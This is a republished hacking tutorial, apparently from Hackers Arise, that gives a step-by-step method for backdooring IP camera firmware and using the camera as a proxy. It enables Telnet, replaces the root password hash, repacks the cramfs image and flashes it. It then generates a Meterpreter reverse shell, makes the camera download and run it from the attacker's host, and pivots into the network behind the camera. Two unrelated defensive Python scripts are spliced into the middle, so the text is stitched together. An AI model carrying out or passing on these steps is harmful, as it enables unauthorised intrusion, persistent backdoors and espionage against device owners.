National Cyber Warfare Foundation (NCWF)

Network Espionage – Using Russian Cameras as Proxy, Part 3


2025-09-16 14:31:06
milo
Red Team (CNA)



The post Network Espionage – Using Russian Cameras as Proxy, Part 3 first appeared on Hackers Arise.











Welcome back, cyberwarriors.





Hope you’re enjoying the series so far. Today we are wrapping it up with the final part, focused on modifying camera firmware. This is the most advanced and risky method. It takes time and precision. The biggest challenge is finding firmware that’s suitable for editing and compiling back without breaking the device. Every manufacturer uses specific formats, so if you mess up the structure or file system, the camera won’t boot again. Always proceed carefully.

















Case 4: Modifications





This case is similar to the previous one, but we are going deeper. Imagine the camera you found does not have any ports open, like SSH or Telnet – and neither is configurable in the settings. At first glance, it looks like a dead end.









Translation: Обновление прошивки — Firmware update
Browse… No file selected. OK








But then you discover it allows firmware updates. Most cameras have this feature available from the web dashboard. That’s your way in. The first step is to get a copy of the firmware. You can find it on third-party firmware archives or from the official manufacturer’s website.





After downloading the firmware, extract it. We found a script file named run.sh inside. When we opened it, we noticed something interesting.

















The script had a Telnet launch command that was commented out. We removed the comment to enable Telnet.

















That solves one part. But we don’t know the Telnet password that is hashed in the passwd file. By default you can find this file in the /etc directory:

















Instead of cracking the existing password hash, we generate our own:





kali > openssl passwd -1 password

















This gives a new hash string. Replace the existing hash in the /etc/passwd file with the one you just generated. Save the changes.

















Now you need to repack the entire directory structure into a new firmware file. Create a new directory and move everything into it:





kali > mkdir firmware





kali > mv etc firmware/





And so on, until you move all other directories.





Recompiling





Our firmware used cramfs (Compressed ROM File System). You’ll need to install the cramfs tools directly from the Ubuntu repo, as they are not available for Kali.





Here is the link where you can find it:





http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/





Let’s download it:





kali > wget http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/cramfsprogs_1.1-6ubuntu1_amd64.deb

















kali > sudo dpkg -i cramfsprogs_1.1-6ubuntu1_amd64.deb

















Once installed, create the new firmware image:

kali > mkcramfs firmware  firmware-x.cramfs

















Rename the file to match the original firmware name to avoid upload issues. We named it firmware here only to keep the walkthrough clear and easy to follow. Go back to the camera dashboard and upload the modified firmware.









Translation: Обновление прошивки — Firmware update
Browse… firmware-x.cramfs OK








Wait a few minutes for it to flash and reboot. To check if it’s back online:





kali > ping





Once the camera responds, connect via Telnet:





kali > telnet 23

















Log in using root and the password you created. If successful, you’ll be inside the system. In our case, the target already had nc installed, which helped a lot.
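Both edits described above, the uncommented Telnet launch line in a startup script and the replaced root hash in /etc/passwd, show up when an extracted firmware tree is compared against a known-good extraction of the vendor image. The following is an added example for that check, not code from the original post; the function names, directory layout and sample file contents are assumptions constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

def file_map(root):
    """Relative path -> SHA-256 for each regular file (symlinks skipped)."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file() and not p.is_symlink()}

def root_hash(root):
    """Password field of root's entry in etc/passwd, or None if absent."""
    passwd = Path(root, "etc", "passwd")
    lines = passwd.read_text(errors="replace").splitlines() if passwd.is_file() else []
    return next((ln.split(":")[1] for ln in lines if ln.startswith("root:")), None)

def active_telnet_lines(root):
    """(script, line) pairs for uncommented telnetd launches in *.sh files."""
    root = Path(root)
    return {(s.relative_to(root).as_posix(), ln.strip())
            for s in root.rglob("*.sh") if s.is_file()
            for ln in s.read_text(errors="replace").splitlines()
            if "telnetd" in ln and not ln.lstrip().startswith("#")}

def audit(baseline, suspect):
    """Findings for a suspect tree compared with a known-good extraction."""
    base, sus = file_map(baseline), file_map(suspect)
    findings = [f"changed: {p}" for p in sorted(set(base) | set(sus))
                if base.get(p) != sus.get(p)]
    if root_hash(baseline) != root_hash(suspect):
        findings.append("root password hash differs from baseline")
    new = active_telnet_lines(suspect) - active_telnet_lines(baseline)
    return findings + [f"telnetd enabled: {p}: {ln}" for p, ln in sorted(new)]

def demo():
    """Audit two constructed trees; hashes and script text are made up."""
    trees = {"good/etc/passwd": "root:$1$SALT$baselineHASH:0:0::/root:/bin/sh\n",
             "good/run.sh": "#!/bin/sh\n# telnetd &\n./app &\n",
             "bad/etc/passwd": "root:$1$SALT$replacedHASH:0:0::/root:/bin/sh\n",
             "bad/run.sh": "#!/bin/sh\ntelnetd &\n./app &\n"}
    with tempfile.TemporaryDirectory() as tmp:
        for rel, text in trees.items():
            path = Path(tmp, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(text)
        return audit(Path(tmp, "good"), Path(tmp, "bad"))

if __name__ == "__main__":
    print("\n".join(demo()))
```

The comparison only means something if the baseline comes from an image whose hash matches the one the vendor publishes.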

















Payload Execution





Determine the architecture of the system:





target > uname -m





Create the payload on Kali:





kali > msfvenom -p linux//meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

















Host the payload on your Kali machine:





kali > python3 -m http.server





Then download it to the target:





target > curl -O http://:8000/shell.elf





target > chmod +x shell.elf





target > ./shell.elf





Open Metasploit on Kali, set up multi/handler with the same payload options, and you’ll get a Meterpreter session. From there, use proxychains with a SOCKS proxy to route your traffic through the compromised camera and access the network behind it. All of these steps were covered in the previous parts.
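On the network, the behaviour described in this part stands out because a camera normally accepts connections and rarely starts them: a Telnet service that was never exposed, a camera fetching a file over HTTP, and camera-initiated sessions to several hosts are all policy violations. The following is an added example of that detection logic over flow records, not code from the original post; the addresses, the allow-list, the record format and the rule names are assumptions, and the sample flows are constructed.

```python
import csv
import io
import ipaddress
from collections import defaultdict

# Assumed site policy (hypothetical addresses): cameras live in one VLAN and
# may only initiate NTP to the gateway; the recorder pulls video from them.
CAMERA_NET = ipaddress.ip_network("10.20.0.0/24")
ALLOWED_EGRESS = {("10.20.0.1", 123, "udp")}
SHELL_PORTS = {22, 23}  # services the cameras do not expose in this policy

# Constructed flow records, one per connection, written initiator -> responder.
SAMPLE = """ts,src,dst,dport,proto
2025-01-01T10:00:00,10.20.1.5,10.20.0.31,554,tcp
2025-01-01T10:00:05,10.20.0.31,10.20.0.1,123,udp
2025-01-01T10:04:10,192.0.2.50,10.20.0.31,23,tcp
2025-01-01T10:06:40,10.20.0.31,192.0.2.50,8000,tcp
2025-01-01T10:09:30,10.20.0.31,10.30.0.8,443,tcp
2025-01-01T10:09:31,10.20.0.31,10.30.0.9,443,tcp
"""

def detect(flow_csv):
    """Return (ts, rule, src, dst, dport) for flows that break the policy."""
    alerts = []
    for r in csv.DictReader(io.StringIO(flow_csv)):
        src, dst = ipaddress.ip_address(r["src"]), ipaddress.ip_address(r["dst"])
        dport = int(r["dport"])
        if dst in CAMERA_NET and dport in SHELL_PORTS:
            alerts.append((r["ts"], "shell-service-on-camera", r["src"], r["dst"], dport))
        if src in CAMERA_NET and (r["dst"], dport, r["proto"]) not in ALLOWED_EGRESS:
            alerts.append((r["ts"], "camera-initiated", r["src"], r["dst"], dport))
    return alerts

def relay_suspects(alerts, min_peers=2):
    """Cameras that initiated sessions to min_peers or more distinct hosts."""
    peers = defaultdict(set)
    for _, rule, src, dst, _ in alerts:
        if rule == "camera-initiated":
            peers[src].add(dst)
    return {cam: sorted(dsts) for cam, dsts in peers.items() if len(dsts) >= min_peers}

if __name__ == "__main__":
    found = detect(SAMPLE)
    for alert in found:
        print(*alert)
    print("possible relay:", relay_suspects(found))
```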





Conclusion





Modifying camera firmware is the most advanced step in gaining persistent access. It allows you to create a custom backdoor even when all ports are closed. The method gives full control, but it also comes with the highest risk. A small mistake and the camera is dead. But if done right, it’s a powerful tool for deeper infiltration. With this final part, you now have a complete playbook for hacking, accessing, and using Russian cameras as proxies in espionage operations. Good luck on your next hunt.




Source: HackersArise
Source Link: https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy-part-3/

